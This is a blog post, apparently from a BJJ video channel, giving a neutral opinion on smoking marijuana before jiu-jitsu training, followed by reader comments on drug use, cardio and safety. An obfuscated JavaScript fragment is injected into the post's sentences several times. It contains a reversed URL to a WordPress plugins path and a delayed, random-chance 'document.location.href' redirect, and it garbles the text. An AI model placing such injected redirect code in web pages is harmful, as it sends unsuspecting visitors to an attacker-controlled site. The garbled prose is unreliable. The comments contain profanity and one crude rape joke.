Opinions on Smoking Weed and BJJ Training Creativity

The culture in BJJ has a lot of people who use marijuana/cannabis/weed regularly as something that helps open up their creativity during training or relax them at night. In toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}today’s video I got a question from our friend who has friends who say that smoking marijuana before training opens up their game and always them toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to be more creative. And he’s curious what my experiences with it and Brazilian Jiu-jitsu are.

I preface this whole video with the fact that I don’t smoke regularly. I’ve done it a few times and don’t dislike or like it a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton. I’m just neutral with it. And if you’re an adult, you can do whatever you want toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to do, and you should have the right toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. That’s why this is an opinion and not some hard stance.

But in the video I do share some possible apprehensions I would have if you decide toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to smoke for creativity purposes. I have these same apprehensions toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towards alcohol, caffeine and other psychoactive drugs that we consume on a regular basis.

I know that many people have strong feelings for or against weed. That’s fine, I don’t. Just sharing my opinion on the idea as asked by a viewer.

Thanks for watching!

I haven’t trained in jiujitsu yet but when I box there’s a fine line between being functionally high and too high. If your not too high, it’s great. Almost spiritual. Your incredibly focused and relaxed making it easier to get into flow. You have an increased awareness of your body, you notice how you breath and gain a stronger intuitive understanding of rhythm.
But over do it just a little bit and you feel like your fighting in a dream lmao

  2. Dee Chism says:

I do 100 times better high

  3. Lord Sauron says:

Great advice!!!! Unbiased!! I fucking love your channel and wish I could live in texas and train with you!!!

  4. Rhabdo B says:

I tried weed prior to training. During the learning portion I was just useless. But the free sparring was great. And other people told me, not me just thinking I was great but I was pulling on someone’s belt and giggling or some nonsense. But I couldn’t follow 5 steps of directions so it was just a bad idea.

All the 10p world champs out there.

  6. Phil Harris says:

it helps me focus on sparring and it makes it more fun but if you're serious about training you best stay off it because it can fuck your head up

  7. tight jg says:

Its okay to smoke a lil but you DON'T need to smoke right before you walk into the gym. Being too stoned like smoking a blunt of the best shit then going to class suck's and you can't learn as good. Ill smoke a lil the day of competition like 2 hours before I leave home then I have to wait at least 2 hours before I compete. So I would train and compete with a little head change but completely fckn baked NO WAY. Now after a competition just walk thru the parking lot of the high school and you'll see mad bowls being smoked, dabbing, bong's, blunts its going down every time. I didn't compete baked BUT like all the matches I watched after my division I would be baked enjoying breaking down the match's and learning in a different way. I also only "Michael Phelps" smoke filtered thru water I will not smoke joints or blunts ever kills your cardio. If you put straight smoke into your lungs without it going thru water your cardio is affected greatly. You can't put smoke of any kind into your lungs and expect your cardio to be better than it was before the smoke.

i train muay thai, jitz, and mma toasted.. and i eat edibles so there is no stink!!! =] highly recommend

  9. Pandamonaeum says:

If you do smoke before, be cautious of the increased pain tolerance, for you might not feel the correct pressure being exerted with some submissions; so be mindful to tap early, else deal with the consequences of tapping to late.

  10. amandaggogo says:

I don't know how I'd do with THC, but I do sometimes pop a CBD gummy or tincture before class, helps me relax and clear my head. I also get anxious alot, especially socially, so it helps for that too. (BJJ also helps me work on my anxiety as well, no time to be anxious about being near someone when they are about to choke you out!)

  15. dalton nonya says:

My view on it is you cant definitively say yes or no ,im sure it works great for some, and not so good for others its really a matter of whether or not it works for you not whether or not it works universally

  16. Tentacles says:

Eddy Bravo, thanks for the question brother.

  17. Frankie Cal says:

That's what a pot head would say.

  18. Rythmortis says:

Roll before during and after. Haha

  19. Matt Stew says:

Joe rogan said you should (if you do smoke) do it before sparring but not before learning. It'll impead your learning but keep you calm cool and collected during sparring

Awesome video. Love it.. right on point..

  21. Callum The Judo George says:

Personally I've smoked for over 5 years anyone who says weed improves your game is probably just a ganja idiot. Any idiot that thinks it's beneficial smoke a spliff go for a run and watch how fast your hear rate will rise due to the shortness of breath. Shortness of breath will literally get you killed in bjj if your not playing patty cake and actually trying to rip off limbs we train hard and I never smoke before any session regardless of how good I think I am in them

  27. Libolt Adventures says:

    Awesome answer.

  28. Robert Mershant says:

ive had probably 1 year of cumulative martial arts experience (3-4 months muay thai and college semester of jiu jitsu). one thing i learned is to not take anything like that before training. and im an every day smoker, so its not like weed is going to throw off my game. but being new and not as in shape as the other guys in class, i find that i dont want my body doing extra work to metabolize a drug while im still trying to get the hang proper forms and build up muscle. im already not eating much before class, so even having coffee before hand can really effect my performance just because of the demand im putting on my body. i suspect that if i knew what i was doing, weed might offer me more perspective, but as a new guy its not the best way to go.

  29. Johannes Sjolte says:

If you can unlock your creativity, by drinking alcohol or smoking weed you can unlock it some other way. The main thing that blocks creativity, in my experience, is a high stress level. You can lower you stress level momentary by using alcohol or weed, but if your stress level is too high on a daily basis there is something wrong in your life that alcohol or weed won't fix.

  30. Daniel Grinnell says:

Can you even join 10th planet if you don’t smoke?

  31. sammy sabbah says:

Hello, I have a question for your page. I have been kickboxing for about 10 years, however, I recently joined a jiu jitsu/mma gym about a month ago. My coach has us rolling everyday and pretty hard too. I am thinking in my head "you haven't taught me anything yet!" I don't even know the bare minimum basics yet and I'm rolling with people 10 years in. Don't get me wrong, I'm holding my own and I'm not doing too badly but I am not doing any real jiu jitsu. I'm just using all my strength to overpower my rolling partners. I'm a pretty strong guy but I dont think that is what jiu jitsu is all about. Is this normal? Is that how most jitsu coaches run a gym?

  32. Ed 1 says:

Depends. I used to wrestle 2 pot heads. One smelled like a combo of old socks, and burning man. The other smelled like a smoker who brushed his teeth and took a quick shower. Basic hygiene and not hotboxing your car with your gi in it goes a long way.

  33. Targa Ray says:

I want anyone that I roll with to be stone cold sober. When I tap, if you are not on point. We are not going to just let it go. If I get injured because you are baked. That person, is going to have a bad day.

  34. Rowan Knopf says:

lets rape ppl if they smoke said nobody ever

  35. gan102 says:

To me this answer is simple: if you smoke weed, you release Dopamine in your brain. This dopamine makes you more relaxed and calm and more adventurous. Yes, it can improve your game. But in my opinion, you are just developing an addiction to a supplement thinking it is improving you. But it does not.

I am a white belt for nearly a year now. I tried both. I definitely improved more when I rolled sober. Of course, you can smoke and roll with your friends and have a good time. But to me this is not a training for combat or torunament.

You are simply disrespecting your comrades and friends, if you roll high while they are sober. You rob them the opportunity to be able to beat you fair and square.
